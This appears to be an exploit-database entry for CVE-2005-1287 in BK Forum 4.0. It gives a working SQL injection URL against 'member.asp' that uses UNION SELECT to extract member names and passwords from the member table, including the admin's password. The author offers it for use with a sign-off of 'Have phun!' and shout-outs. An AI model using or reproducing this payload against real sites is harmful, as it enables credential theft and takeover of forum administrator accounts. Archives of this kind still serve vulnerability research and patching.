[] NeoSense

BK Forum 4.0 - 'member.asp' SQL Injection

Author: n0m3rcy
type: webapps
platform: asp
port: 
date_added: 2006-04-23 
date_updated:  
verified: 1 
codes: OSVDB-15784;CVE-2005-1287 
tags: 
aliases:  
screenshot_url:  
application_url: 

# BK Forum <= 4.0 Remote SQL Injection
# by n0m3rcy
# Copyright (c) 2006 n0m3rcy <n0m3rcy@bsdmail.org>
# Exploit:

First you must be logged in
Then type this in your browser

http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1

You will find admin's password

# Shoutz:
nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00

# Have phun!

# milw0rm.com [2006-04-24]